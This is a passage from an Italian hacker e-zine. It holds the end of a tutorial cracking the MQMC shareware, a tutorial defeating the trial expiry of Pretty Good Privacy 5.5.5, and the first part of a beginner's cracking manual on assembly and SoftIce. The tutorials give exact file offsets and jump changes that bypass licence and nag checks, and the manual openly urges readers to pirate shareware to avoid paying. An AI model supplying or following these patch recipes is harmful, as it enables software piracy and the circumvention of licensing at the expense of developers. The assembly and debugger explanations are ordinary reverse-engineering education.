Vedete la call a 48A1FD? Quella sar... la routine da fottere: infatti, Š
proprio quella che richiama la Message Box. Fateci doppio clic col topo e in
mezzo alla barra dei pulsanti del Dasm dovrebbe "accendersi" una scritta:
CALL. Cliccateci sopra. (* Cazzo mi si sta inkiodando il Winkaz... 67%
risorse disponibili... pork putt meglio riavviare... schiusatemi un attimo...
torno subito, il mio Celeron overclokkato tra un po' si fonde... OK ho
riavviato... ora mi sento pi- tranquillo... ripartiamo*). Avete cliccato
sulla CALL? Bene, allora ora vi trovate qui:
* Referenced by a CALL at Addresses:
|:00455B69 , :00455E97 , :00458189 , :00461087 , :004612F6 
|:00461326 , :0046A09B , :0046A100 , :0046ABB4 , :0046AC3D 
|:0046ACAF , :0046AD10 , :0046AD71 , :0046ADDE , :0046B8A6 
|:0046B909 , :0047E62A , :00484B80 , :00484F17 , :0048A1FD 
|:0048A3AE , :0048A42F , :0048D945 , :00491AA1 , :004922CD 
|:00492AC6 , :0049328D 
|
* Reference To: user32.MessageBeep, Ord:0000h
|
:00406C9C Jmp dword ptr [0049F66C]
:00406CA2 mov eax, eax
In teoria ora bisognerebbe fare un lavoretto, ovverosia (WOW!) spulciare
OGNUNO degli indirizzi sopra... fate una prova: andate a :00455E97. Due righe
pi- in altro vedrete un jne che, se eseguito, SALTA COMPLETAMENTE VIA la call.
Ecco quindi che bisognerebbe cambiarlo in JMP. Tornate ora a :00406C9C;
capito cosa dovete fare? Andare in OGNUNA dlle CALL sopra, trovare i JUMP che
le saltano e cambiarli in JMP incondizionali... il problema Š che non tutte
tali call sono necessarie, anzi, e inoltre alcune, come ad esempio la prima
(:00455B69), non hanno jump che le possano evitare nei dintorni... insomma,
un casino... ecco perchŠ ho deciso di dirvi io direttamente quali sono quelle
su cui agire (vi pensate che lavorazzo ho fatto?!): l'importante Š che voi
capiate il concetto per poi poterlo applicare nelle varie occasioni.
Andate in :0048A1FD. Vi troverete nel codice visto all'inizio: ecco a cosa
serve il jne a :0048A1E3!!! E' uno di quelli che fottono la CALL!! Infatti
se eseguito il proggy salta pi- avanti!
Ora posteggiate il kulo in :0048A3AE. Sarete qui:
* Possible StringData Ref from Code Obj ->"0003"
|
:0048A321 mov edx, 0048A728
:0048A326 mov eax, dword ptr [ebx+00000220]
:0048A32C call 0045FA70
:0048A331 lea edx, dword ptr [ebp-50]
:0048A334 lea eax, dword ptr [ebp-40]
:0048A337 call 00404C0C
:0048A33C mov eax, dword ptr [ebp-40]
:0048A33F lea ecx, dword ptr [ebp-3C]
:0048A342 mov edx, 00000004
:0048A347 call 00489D84
:0048A34C mov ecx, dword ptr [ebp-3C]
:0048A34F lea eax, dword ptr [ebp-38]
:0048A352 mov edx, 0048A630
:0048A357 call 00403E40
:0048A35C mov eax, dword ptr [ebp-38]
:0048A35F call 00407F84
:0048A364 mov dword ptr [ebp-54], eax
:0048A367 fild dword ptr [ebp-54]
:0048A36A add esp, FFFFFFF8
:0048A36D fstp qword ptr [esp]
:0048A370 wait
:0048A371 lea eax, dword ptr [ebp-04]
:0048A374 call 00409D38
:0048A379 cmp dword ptr [ebp-04], 00000000
:0048A37D je 0048A3D9
:0048A37F mov eax, dword ptr [ebp-04]
:0048A382 call 0040A4B0
:0048A387 fstp qword ptr [ebp-1C]
:0048A38A wait
:0048A38B fld qword ptr [ebp-0C]
:0048A38E fcomp qword ptr [ebp-1C]
:0048A391 fstsw ax
:0048A393 sahf
:0048A394 jnb 0048A3D9 <-- Jump if not below... interessante non vi sembra?
:0048A396 mov eax, dword ptr [0049C244]   Guardate DOVE salta: DOPO la CALL
:0048A39B cmp dword ptr [eax], 00000000   a :0048A3AE!! Bene bene...
:0048A39E je 0048A3AC
:0048A3A0 mov eax, dword ptr [0049C244]
:0048A3A5 mov eax, dword ptr [eax]
:0048A3A7 call 00430A74
* Jump at Address:
|:0048A39E(C)
|
:0048A3AC push 00000000
* Reference To: user32.MessageBeep, Ord:0000h
|
:0048A3AE Call 00406C9C
:0048A3B3 push 00000032
:0048A3B5 mov cx, word ptr [0048A644]
:0048A3BC mov dl, 02
* Possible StringData Ref from Code Obj ->"MQMC323.0"
|
:0048A3BE mov eax, 0048A650
:0048A3C3 call 00444C24
:0048A3C8 mov eax, dword ptr [0049C28C]
:0048A3CD mov eax, dword ptr [eax]
:0048A3CF call 00432A34
:0048A3D4 jmp 0048A5A7
* Jump at Addresses:
|:0048A37D(C), :0048A394(C)
|
:0048A3D9 mov cx, word ptr [ebp-28]
:0048A3DD mov dx, word ptr [ebp-26]
:0048A3E1 mov ax, word ptr [ebp-24]
:0048A3E5 call 00408F88
:0048A3EA fstp qword ptr [ebp-5C]
:0048A3ED wait
:0048A3EE mov cx, word ptr [ebp-22]
:0048A3F2 mov dx, word ptr [ebp-20]
:0048A3F6 mov ax, word ptr [ebp-1E]
:0048A3FA call 00408F88
:0048A3FF fsubr qword ptr [ebp-5C]
:0048A402 call 00402A98
:0048A407 mov word ptr [0049DC04], ax
:0048A40D cmp word ptr [0049DC04], 001E
:0048A415 jbe 0048A485
:0048A417 mov eax, dword ptr [0049C244]
:0048A41C cmp dword ptr [eax], 00000000
:0048A41F je 0048A42D
:0048A421 mov eax, dword ptr [0049C244]
:0048A426 mov eax, dword ptr [eax]
:0048A428 call 00430A74
Infine in :0048A42F. Attraccherete qui:
* Jump at Addresses:
|:0048A37D(C), :0048A394(C)
|
:0048A3D9 mov cx, word ptr [ebp-28]
:0048A3DD mov dx, word ptr [ebp-26]
:0048A3E1 mov ax, word ptr [ebp-24]
:0048A3E5 call 00408F88
:0048A3EA fstp qword ptr [ebp-5C]
:0048A3ED wait
:0048A3EE mov cx, word ptr [ebp-22]
:0048A3F2 mov dx, word ptr [ebp-20]
:0048A3F6 mov ax, word ptr [ebp-1E]
:0048A3FA call 00408F88
:0048A3FF fsubr qword ptr [ebp-5C]
:0048A402 call 00402A98
:0048A407 mov word ptr [0049DC04], ax
:0048A40D cmp word ptr [0049DC04], 001E
:0048A415 jbe 0048A485 <-- Jump if below or equal... WOW un altro che salta
:0048A417 mov eax, dword ptr [0049C244]                    DOPO la CALL!!
:0048A41C cmp dword ptr [eax], 00000000
:0048A41F je 0048A42D
:0048A421 mov eax, dword ptr [0049C244]
:0048A426 mov eax, dword ptr [eax]
:0048A428 call 00430A74
* Jump at Address:
|:0048A41F(C)
|
:0048A42D 6A00 push 00000000
* Reference To: user32.MessageBeep, Ord:0000h
|
:0048A42F Call 00406C9C
:0048A434 lea ecx, dword ptr [ebp-38]
:0048A437 mov edx, 00000006
:0048A43C mov eax, 000028EA
:0048A441 call 00489F6C
:0048A446 mov edx, dword ptr [ebp-38]
:0048A449 lea eax, dword ptr [ebp-50]
:0048A44C call 00404C60
:0048A451 lea ecx, dword ptr [ebp-50]
* Possible StringData Ref from Code Obj ->"0001"
|
:0048A454 mov edx, 0048A620
:0048A459 mov eax, dword ptr [ebx+00000220]
:0048A45F call 0045F848
:0048A464 push 00000032
:0048A466 mov cx, word ptr [0048A644]
:0048A46D mov dl, 02
* Possible StringData Ref from Code Obj ->"MQMC323.0"
|
:0048A46F mov eax, 0048A650
:0048A474 call 00444C24
:0048A479 mov eax, dword ptr [0049C28C]
:0048A47E mov eax, dword ptr [eax]
:0048A480 call 00432A34
* Jump at Addresses:
|:0048A281(U), :0048A415(C)
|
:0048A485 call 00409148
:0048A48A call 00402A98
:0048A48F lea ecx, dword ptr [ebp-38]
:0048A492 mov edx, 00000004
:0048A497 call 00489F6C
:0048A49C mov edx, dword ptr [ebp-38]
:0048A49F lea eax, dword ptr [ebp-50]
:0048A4A2 call 00404C60
:0048A4A7 lea ecx, dword ptr [ebp-50]
OK perfetto... lavoro praticamente finito... per eliminare il nag basta
cambiare i 3 JUMP indicati sopra in JMP incondizionali. Come fare ve l'ho
gi... spiegato sopra... e infine rinominare prima il file MQMC.exe come cazzo
volete, poi la sua copia in MQMC32.exe. Tutto chiaro?
Bene: PROGRAMMA CRACKATO.
RIASSUMENDO
INDIRIZZI HA CAMBIARE:
Per il programma: 48A1ED (OFFSET 895ED da je a jmp).
Per il nag-screen: 48A1E3 (OFFSET 895E3 da jne a jmp), 48A394 (OFFSET 89794
da jnb a jmp), 48A415 (OFFSET 89815 da jbe a jmp).
OK ho finito... uff che fatica... non pensavo che scrivere un tute fosse cos
lungo...
Bene, spero che esso vi sia stato utile, io da parte mia ho cercato di
scriverlo nel migliore dei modi, cioŠ semplice e comprensibile a tutti.
Se vi piace, non vi piace, volete insultarmi, ecc.... basta che mandiate
un'e-mail all'indirizzo sotto.
Vorrei ora ringraziare un bel po' di persone..... ometto di dilungarmi troppo
sulle rispettive motivazioni, altrimenti questa parte viene pi- lunga
dell'Essay...
Ringrazio e saluto: Quequero innanzi tutto (spero di riuscire a vederti prima
o poi in IRC! :-))) per aver publicato il mio tute sull'UIC, per l'impegno
che sta dimostrando con l'UIC stessa e perchŠ mi risponde a tutte le domande
che gli faccio: ciao QUEEEE!!, [aLT255], ^courier, mOoNsHaDoW e WhiteFly,
sempre molto disponibili su IRC, xOANINO (il mito), tutti i Ringzer0 (per i
loro tute e perchŠ sono GRAAANDIII), in generale tutto il chan di #crack-it e
tutti gli Attila_Hack members, in particolare BoBo, che mi ha fatto partecipe
di questa iniziativa e che mi ha permesso di pubblicare qui i miei tute.
Grazie BOBO!! Sei un amicoooo :) !!
Saluto anche DFX, great friend nonchŠ compagno di scuola, il Morando (altro
amico) e coloro che sono arrivari a leggere fino in fonto questo tute...
GRAZIEEEEE!!!! E mi raccomando: citando una frase di...azz chi era... boh...
non so, spero che costui mi perdoner… per il copyright violato... ricordate:
"A day without learning is a lost day..." Impariamo, gente, impariamo.
SeE YoU sOoN,
                                         
                ****************************************************
                *                                                  *
                *                       Ritz                       *
                *                Eclyps3@excite.com                *
                * - The way is made clear when viewed from above - *
                *                On ICQ: 41793377                  *                       
                *                  On IRC: Ritz                    *
                *                                                  *
                ****************************************************





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



					CRACKARE PRETTY GOOD PRIVACY 5.5.5
     
       *******************************                               
       *                             *                            
       *  Pretty Good Privacy 5.5.5  *                       
       *                             *                                 
       *                 by Ritz     *                             
       *                             *
       *******************************                                        
******************************************************************************
DESCLAIMER LEGALE:
Ascoltatemi bene prima di leggere questo articolo: esso Š stato scritto a PURO
scopo DIDATTICO: io, Ritz, non incoraggio chi volesse servirsene per scopi
illegali; inoltre non mi assumo alcuna responsabilit... se vi autodistruggete i
progammi. CAPITTOOOO?!
******************************************************************************
Allora, in questo tute cercher• di spiegarvi come a volte le protezioni di un
programma possano rivelarsi pi- semplici del previsto... l'unico problema Š
sapere dove CERACRLE!!
Il proggy in questione Š Pretty Good Privacy 5.5.5:  penso sappiate tutti a
che serve: Š un proggy di crittazione a chiave asimmetrica, cioŠ per crittare
e decrittare non si usa la stessa chiave... molto sicuro quindi per
scambiarsi ad esempio e-mail senza essere sgamati. Consiglio di acquistarlo
perchŠ dopotutto bisogna ricompensare i programmatori della Network
Associates che hanno fatto un cos buon lavoro (a parte la protezione
facilmente scazzabile :)))). Lo trovate cmq dappertutto.
OK se parte... 
Installato il PGP? S? Bene, avviatelo... anzi no... prima cavate l'icona dal
Tray, quindi portate la data del Windouz avanti di 46 anni. Riavviate il PGP.
Vi appare un nag screen del cazzo che vi dice che i prog Š scaduto? Bene,
siete a cavallo! Entrate in Sice con CTRL+D e mettete un bpx messageboxa per
intercettare l'API che fa apparire il messaggio. Uscite dal Sice e caricate
il Pretty Bad Protection (scherzo eh?) da Start/Programmi/Pretty Good
Privacy/PGPtools.
Ora ci dovremmo aspettare che il debugger poppi prima della schermata:
INFATTI! BINGO! Premete F11 per entrare nella DLL (o l'EXE) che genera la
chiamata, e, azz, appare la schermata del proggy... pork putt, come mai non
siamo entrati nel codice? Boh, cliccate su OK e.... il SoftIce ripoppa!
Questa volta diretamente su una DLL del PGP: PGP55cd.dll, localizzata in
C:\WINKAZ\SYSTEM, e precisamente in questo punto:
:0048A202 POP EDI
Bene, ora non vi resta che fare una cosa: disassemblate la cara PGP55cd.dll
col Dasm. Fatto? VabbŠ... tanto per sicurezza andiamo a guardare le String
Data References, sar… impossibile trovare qualcosa, cmq tentiamo: clicchiamo
sul secondo pulsante della barra partendi da destra, osserviamo un po' le
stringhe... hum hum... mumble mumble... osservate un po' la nona partendo dal
basso: "Thank you for evaluating Pretty", cazzo ma non Š la parte iniziale
del testo della messagebox da fottere? fateci doppio clic sopra; vi troverete
qui:
 * Jump at Address:
|:10002814(C)
|
:10002867               cmp dword ptr [esp+24], 00000002
:1000286C               jne 10002876
:1000286E               add dword ptr [esp+08], 00278D00
* Jump at Address:
|:1000286C(C)
|
:10002876               cmp esi, dword ptr [esp+08]
:1000287A               jbe 10002881 <--- Mi suona sinistro jump if below or
                                                                   equal...
* Possible Reference to String Resource ID=00001: "General strings"
                                  |
:1000287C               mov edi, 00000001
* Jump at Address:
|:1000287A(U)
|
:10002881               mov eax, edi
:10002883               pop edi
:10002884               pop esi
:10002885               add esp, 00000014
:10002888               ret
:10002889               nop
:1000288A               nop
:1000288B               nop
:1000288C               nop
:1000288D               nop
:1000288E               nop
:1000288F               nop
* Referenced by a CALL at Address:
|:100027A2   
|
:10002890               sub esp, 00000400
:10002896               mov ecx, 00000040
:1000289B               lea eax, dword ptr [esp]
:1000289F               push esi
:100028A0               push edi
* Possible StringData Ref from Data Obj ->"Thank you for evaluating Pretty "
                                        ->"Good Privacy.  The 60"
                                  |
:100028A1               mov esi, 100280F8
:100028A6               lea edi, dword ptr [esp+08]
:100028AA               repz
:100028AB               movsd
:100028AC               mov ecx, dword ptr [esp+0000040C]
:100028B3               push 00000000
:100028B5               movsw
Visto bene il codice...? Dunque a :100028A1 viene generata il nag-screen,
quindi nei dintorni ci dovrebbe essere qualcosa di utile... vediamo un po'...
osservate :1000287A, un jbe.. cambiandolo in je o JMP forse... naaaa troppo
facile... cmq vale la pena tentare, vero? Segnatevi l'OFFSET (1C7A) e
cambiatelo con HIEW (non vi spiego come si fa, se non lo sapete leggete
l'altro mio tutorial :))): provate a mettere, che so, jump incondizionale,
tanto 99% non funzioner…... fatto? Bene, avviate il PGP, e pork putt azz tr!!
Programmillo crackato!! Facile no? Beh, che dire, tute finito.
Non ho altro da aggiungere. VabbŠ, non mi resta che augurarvi 
H A P P Y     C R A C K I N G!!!
N.B.: ricordatevi di riportare indietro la data di WINCESS dopo avre finito
tutto eh?
P.S.: mi Š venuta in mente appena ora una cosa interessante che non centra
nulla col cracking: il calendario di Windozz dovrebbe fermarsi al 2099: se
io imposto la data al 31 dicembre 2099 e poi il giorno dopo riavvio che
succede? Magari vengo trasportato in un'altra dimensione dove tutto Š
posseduto da Microsoft e il dittatore assoluto Š Bill Gates... meglio lasciar
perdere... se qualcuno ha il coraggio di farlo... mi scriva per comunicarmi i
risultati... :-))))
Vorrei ringraziare e salutare anche questa volta Quequero (ma vi pensate,
mi ha pubblicato anche questo articolo: Š semplicemente GRANDEEE), i ring0,
il chan #crack-it, gli Attila_Hack members (spec. BoBo), DFX e il Moran'.
Grazie inoltre a chi Š arrivato a leggere fino a qui e ne ha tratto
profitto :)). Per qualsiasi cosa, scrivetemi [se usate il PGP (per il crack
basta che cerchiate in rete... ihihihihih) mandatemi la vostra chaive].
ZeE yOu ZoOn,
                ****************************************************
                *                                                  *
                *                       Ritz                       *
                *                Eclyps3@excite.com                *
                * - The way is made clear when viewed from above - *
                *                On ICQ: 41793377                  *                       
                *                  On IRC: Ritz                    *
                *                                                  *
                ****************************************************




+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

=====================================================================
                        Manuale di Cracking - by S2 Prima parte
=====================================================================
1. Prefazione
Per iniziare vorrei subito dire che tutto quello che segue non e'
assolutamente da prendere sul serio e non e' assolutamente da fare o provare.
Anzi, e' assolutamente illegale, e quindi, se non volete dire "ciao" a un
pulotto che suona al vostro campanello perche' siete diventati pirati
informatici non fatelo.
Bene bene bene... Detto questo un ciao a tutti voi che avete una gran voglia
di fottere tutti quei programmini Shareware del cazzo che dopo trenta giorni
di evaluation non funzionano piu', o quelli che danno possibilita' limitate a
meno che non inseriate la mistica password associata all'user name inserito
ecc... vi siete proprio rotti le balle... vero? Io almeno, confesso che me le
sono rotte, e quindi... aguzzo l'ingegno e inculo tutte quelle softwarehouse
che ti chiedono 20$ per il loro programma. Ma se vi devo dire la verita' non
lo faccio solo per questo, ma anche per un altro motivo: Quando riesco a
mettere insieme tutti i pezzi del puzzle, e vedo sullo schermo del mio bel pc
una finestrella che mi dice "Tnx for registering" mi sento un grande. Perche'
penso di essere uno dei pochi su questa faccia della terra a essere in grado
di farlo, e quindi mi sento un figo. Comunque, quando poi ripenso ai 20$
risparmiati sono ancora piu' felice... Quindi questo manuale non e' da vedere
come un manuale al crackaggio, ma piu' come un manuale della felicita'... che
umorista che sono... io non devo passare tutte queste ore davanti al pc...
poi mi metto a scrivere stronzate del genere... sono proprio fuso... vabbe'...
mi accendo una cicca, va'.
In ogni caso questo non e' un manuale di Assembler, quindi non aspettatevi
particolari sull'asm, quelli li trovate in inglese in giro per Internet, ma
e' una guida al crackaggio. Quello che voglio insegnare non e' come trovare le
password associate agli user name, ma semplicemente come avere l'accesso. Per
riuscire a scoprire la password, avete bisogno di conoscere un sacco di asm e
soprattutto dovete farvi un pacco cosi' di matematica... ma questo e' un altro
file... forse in futuro ve lo scrivero'... Adesso andiamo al sodo e cominciamo:
2. Breve introduzione all'Assembler
Allora. Per crackare un programma bisogna disassemblarlo, cioe' tradurre il
programma .exe o .com in una lista di istruzioni da noi comprensibili, per
poi modificarlo in modo da fargli credere di aver inserito la password
giusta, o che i 30 giorni non sono passati e cosi' via. Siccome per
disassemblare i programmi da crackare si usa il SoftIce, che disassembla i
programmi in Assembler (asm), bisogna sapere questo linguaggio. Voi direte,
"ma non possiamo tradurre il programma in italiano, cosi' lo capiscono
tutti?". E io vi rispondo, ci sto lavorando, ma quando avro' finito lo
distribuiro' in una versione Shareware incrackabile! Tje'!
Ok. Ora vi spiego un po' come funziona l'Assembler:
2.1 I registri
La CPU del computer e' divisa in diversi registri, che ora vi spiego uno per
uno cosa sono e come si chiamano, e servono per memorizzarci dei dati. I
registri in tutto sono quattro, e si chiamano
 AX - Accumulatore
 BX - Base register
 CX - Contatore
 DX - Data register
Ognuno di questi registri puo' essere suddiviso in una parte alta e una bassa.
Per esempio AX si suddivide in AL (Low) e AH (High). Nella CPU del Pentium,
che lavora a 32 bit, i registri si chiamano EAX, EBX e cosi' via. Mi spiego
meglio con questo schemino:
 AL = 8 Bit (parte bassa del registro AX)
 AH = 8 Bit (parte alta del registro AX)
 AX = 16 Bit (formato da AL e AH messi insieme)
 EAX = 32 Bit (formato da AX e altri 16 Bit che pero' non sono direttamente
               acessibili dall'utente)
Ovviamente questa suddivisione vale anche per BX, CX e DX.
Poi ci sono i segment register:
CS - Vuol dire Code segment. E' l'area di memoria nella quale si trova il
     programma che state modificando. L'indirizzo CS:IP e' l'istruzzione che
     state per eseguire.
DS - Il Data segment. La parte di memoria nella quale si trovano i dati. La
     CPU di solito vi accede solo in lettura.
ES - Extra segment. In questa area di memoria la CPU vi accede in scrittura.
IP - Instruction pointer. E' l'indirizzo dell'istruzione che state per
     eseguire.
SS - Stack segment. Questa e' roba complicate... non vi serve per i vostri
     scopi crackistici.
SI - Source Index. E' un puntatore.
DI - Destination index. Un'altro puntatore.
BP - Base pointer. Questo viene usato insieme allo SS.
SP - Stack pointer. Serve a puntare una locazione all'interno dello Stack. E'
     usato insieme a SS.
Questi sono i registri della CPU, le informazioni qui riportate, non sono
complete, ma non staro' neanche qui' a completarle, perche' per i nostri loschi
scopi non sono di importanza rilevante. Se proprio volete saperne di piu'
andate a leggervi una delle tante guide sull'Assembler che si trovano in giro
per Internet.
2.2 I flag
Servono ad indicare se un jump condizionale (vedi sezione istruzioni) deve
essere eseguito o no. Per esempio
CMP AL, BL ........... Confronta il registro al con bl
 JZ 3F1D ................... Salta se zero a 3F1D
La prima istruzione esegue un confronto tra AL e BL. Se sono uguali il flag Z
diventa 1 (attivo), nel caso contrario invece, 0 (disattivo).
La seconda istruzione salta all'indirizzo specificato se il flag Z e' 0.
Se per esempio in AL abbiamo il numero di giorni da quando stiamo usando il
programma, e in BL, il numero di giorni che il programma deve funzionare,
modificando il flag zero possiamo far credere al programma che i giorni ancora
non sono finiti, e quindi possiamo continuare ad usare il programma. Capito?
Mettiamo il caso:
AL = 3 .................... Stiamo usando il prog. da 3 giorni
BL = 1E .................. (1E = 30 in Hex) Per quanti giorni possiamo usare
                                            il prog.
Premesso questo, ora eseguiamo i comandi:
CMP AL, BL ........... Confronta il 3 con il 30d
JZ 3F1D .................. Se i due sono uguali (tutti e due 30, flag Z = 1)
                           salta a 3F1D e ci dice di registrare il programma
Tutto chiaro? Penso di si... queste sono cazzate da capire in fondo, credo.
2.3 Le istruzioni
MOV Dest. Source - Sposta un valore da Source a Dest. Per esempio MOV AL,
    BL - Sposta il contenuto di BL in AL.
CMP var1, var2 - Confronta i due valori di var1 e var2. Per esempio CMP AL,
    BL - Confronta il contenuto di AL con quello in BL. Semplice no? Be'...
    questa istruzione funziona come una sottrazione: il valore in var2 viene
    sottratto da var1. Cioe', se ho 3 in AL, e 8 in BL, il risultato sara'
    3 - 8 = -5. Il flag Carry (C) si attivera' (questo flag si attiva ogni
    volta che il numero e' negativo). Nel 99,9% dei casi questo comando viene
    usato per confrontare la password da voi inserita e quella giusta, oppure
    come nell'esempio sopra, i giorni trascorsi, e quelli trascorribili (ma
    esiste questa parola?).
JMP label - Questa e' l'istruzione piu' bella. Esegue un salto all'indirizzo
    specificato. Lo troverete, di solito dopo un CMP. Ci sono diverse
    variazioni di questo comando, che ora vi elenchero', e vanno tutte a
    controllare i flag Z, O, S, C e P. Nella sua forma piu' semplice e' JMP
    label, cioe', salta a label qualsiasi siano i valori dei flag.  Ponendo
    il comando CMP AX, BX, abbiamo:
JNZ - Jump if not zero, AX diverso da BX
JZ - Jump if zero, AX uguale a BX
JB - Jump if below, AX < BX, C = 1
JA - Jump if above, AX > BX, C = 0
JNGE - Jump if not greater or equal, AX<=BX, S diverso da 0
JGE - Jump if greater or equal, AX=>BX, S = 0
JLE - Jump if less or equal, AX<=BX, Z=1 o S=F
Che palle! Vabbe'... cen'e' altri di 'sti' JMP, ma non credo che vi servano per
i vostri loschi scopi, quindi non preoccupatevi... anche se non li sapete non
cambia un cazzo. Comunque, se proprio vi interessano li trovate in un
qualsiasi manuale di Assembler in giro per Internet.
CALL label - Richiama una routine che si trova all'indirizzo specificato con
             label. Per esempio CALL 1F3D, esegue la routine a CS:1F3D. Poi,
             eseguendo la routine, quando trova un'istruzione RET torna
             all'istruzione dopo CALL. Facile no? Di solito, quelle chiamate
             con CALL sono delle routine che controllano il testo da voi
             inserito, oppure criptano la password che avete inserito ecc.
INT n - Esegue un'interruzione. Un'interruzione e' come una routine, pero' non
    e' nel programma, ma da qualche parte nel DOS, o nel BIOS, dipende dalla
    n. Per esempio quei giochini vecchissimi che chiedevano il KeyDisk
    inserito usavano l'int 13 per vedere se c'e'ra il dischetto inserito o no
    ecc. Comunque cazzate... in Windows gli INT non esistono quasi piu'.
That's it. Questi sono i comandi principali dell'asm. Spero che gli abbiate
capiti, perche' senza questi poi non ci capirete una minchia nel SoftIce.
Anzi... se volete approfondire, c'e' il Assembly language foundamentals
tutorial che aspetta solo di essere letto e studiato. I comandi che vi ho
dato qui sono pure pochi, ma comunque quelli piu' importanti.
3. L'uso del debugger
Ok. Aspettate un'attimo che mi accendo una cicca... fumo troppo... ma vabbo'.
Per spiegarvi come funziona il SoftIce vi traduco semplicemente le parti piu'
importanti della guida che trovate anche compattata nel file SoftIce.zip.
Cosi' risparmio la fatica di pensare ai comandi.
Allora... intanto i consiglio di mettere una robe del genere alla fine del
vostro Autoexec.bat:
choice /tn,2 Caricare softice?
 if errorlevel 2 goto win
 c:\softice\winice (qui' mettete la righa che vi aggiunge il SoftIce nell'installazione)
 goto end
:win
 choice /ts,1 Caricare windows?
 if errorlevel 2 goto end
 win
:end
Ed ora passiamo ai comandi principali del SoftIce:
3.1 I comandi del SoftIce
E' impossibile debuggare bene senza sapere come funzionano i BreakPoints (Bp).
Un bp e' un'istruzione per la cpu che le dice di fermare l'esecuzione del
programma dopo un accesso ad una certa locazione di memoria, oppure dopo
certi eventi del programma stesso e da' il controllo al debugger. Quando setti
un bp del SoftIce e poi torni al programma che stai usando, SoftIce compare
automaticamente quando la condizione per la quale e' settato il bp e'
verificata.
3.1.2 BreakPoint
Bc # : Clear Breakpoint--elimina un breakpoint messo in precedenza nel
       Soft-Ice; devi sapere il numero del bp...
Bd # : Disable Breakpoint--disabilita il bp ma non lo cancella; devi sapere
       il numero del bp...
Be # : Enable Breakpoint--abilita il bp che hai disabilitato in precedenza;
       devi sapere il numero del bp...
Bl : List Breakpoints--mostra una lista di tutti i bp settati nel softice,
     il loro stato (abilitato, disabilitato), e il loro numero.
Bmsg : Break on Windows Message. Sintassi: BMSG window handle L begin-message
       end-message
Bpint : Break on Interrupt. Funziona solo con le interruzioni trattate da IDT
        (95/NT). Sintassi: BPINT int-number
Bpio: Si ferma quando c'e' un accesso in lettura o scrittura ad una porta I/O
      con un certo indirizzio. Sintassi: BPIO port [R|W|RW] [EQ|NE|GT|LT|M
      value] [c=count]
Bpm: Si ferma quando c'e' un accesso alla memoria in lettura (read), scrittura
     (write), o esecuzione (execution). Sintassi: BPM[B|W|DW] address
     [R|W|RW|X]
Bpx : Break on execution. Sintassi: BPX address/symbol [c=count]
      [EQ|NE|GT|LT|M value] [c=count]
Bpr : Break on memory range. Sintassi: BPR start-address end-address
      [R|W|RW|T|TW] [expression]
Bprw : Break on program/code segment. Sintassi: BPRW module-name|selector
       [R|W|RW|T|TW] [expression]
3.1.2 Steppare attraverso il programma
Debuggare in se' vuol dire eseguite una istruzione alla volta di un programma
in modo da poter vedere come cambiano la memoria, i registri, i flags e le
variabili. I principali comandi per farlo sono:
P : Esegue una istruzzione e vede le CALL come una istruzzone sola. Shortcut:
    il tasto F10.
P RET : Esegue il programma finche non trova un'istruzione RET. Shortcut: il
        tasto F12.
T : Esegue una istruzzione. Shortcut: il tasto F8.
3.1.3 Visualizzare informazioni sul sistema
Addr : Visualizza o cambia ad un contesto di indirizzi.
Class : Visualizza informazioni sui Windows Classes.
CPU : Visualizza i registri della CPU.
Exp : Carica/Visualizza i simboli esportati da un DLL.
GDT : Visualizza la Global Descriptor Table.
Heap : Visualizza i Global Heap di Windows.
Heap32 : Visualizza/attraversa i Global Heap di Windows.
HWND : Visualizza informazioni sui Windows Handles.
IDT : Visualizza la Interrupt Descriptor Table.
LDT : Visualizza la Local Descriptor Table.
LHeap : Visualizza i Windows Local Heap.
Map32 : Visualizza una mappa di memoria di tutti i moduli a 32bit caricati
        in memoria.
MapV86 : Visualizza la mappa di memoria DOS memory della macchina virtuale
         corrente.
Mod : Mostra la Windows Module List.
Page : Mostra le Page Table information.
Proc : Visualizza informazioni su un processo.
Stack : Visualizza una call stack.
Sym : Imposta o visualizza un Symbol.
Task : Mostra Windows Task List.
VCall : Mostra i nome e indirizzi di una routine VxD chiamabile con CALL.
VM : Visualizza informazioni sulle macchine virtuali.
VXD : Visualizza la mappa Windows VXD.
.VMM : Chiama il VMM Debug Informational Services menu.
.VPICD : Chiama il VPICD Debug Information Menu.
.VXDLDR : Mostra informazioni VXD.
WMSG : Visualizza i nomi e numeri dei messaggi Windows.
Inoltre, cosa molto importante, che stavo quasi per dimenticarmi, c'e' da dire
che nel SoftIce ci entrate con CTRL-D. Figo, no?
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
         La seconda parte di questo fantastico tute sarà presente su Wannabe 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
 __          _                  
/ _\ ___ ___(_) ___  _ __   ___ 
\ \ / _ \_  / |/ _ \| '_ \ / _ \
_\ \  __// /| | (_) | | | |  __/
\__/\___/___|_|\___/|_| |_|\___|
                                
   ___    BoBo & LaNdo                               _             
  / _ \_ __ ___   __ _ _ __ __ _ _ __ ___  _ __ ___ (_)_ __   __ _ 
 / /_)/ '__/ _ \ / _` | '__/ _` | '_ ` _ \| '_ ` _ \| | '_ \ / _` |
/ ___/| | | (_) | (_| | | | (_| | | | | | | | | | | | | | | | (_| |
\/    |_|  \___/ \__, |_|  \__,_|_| |_| |_|_| |_| |_|_|_| |_|\__, |
                 |___/                                       |___/ 




Introduzione: by b0nu$

===========================================================================
Questi file sono protetti dal diritto d'autore e sono liberamente riproducibili 
a condizione di non farne uso comemrciale o economico o per fine di lucro senza 
la preventiva autorizzazione dell'autore. In ogni caso deve sempre essere indicato 
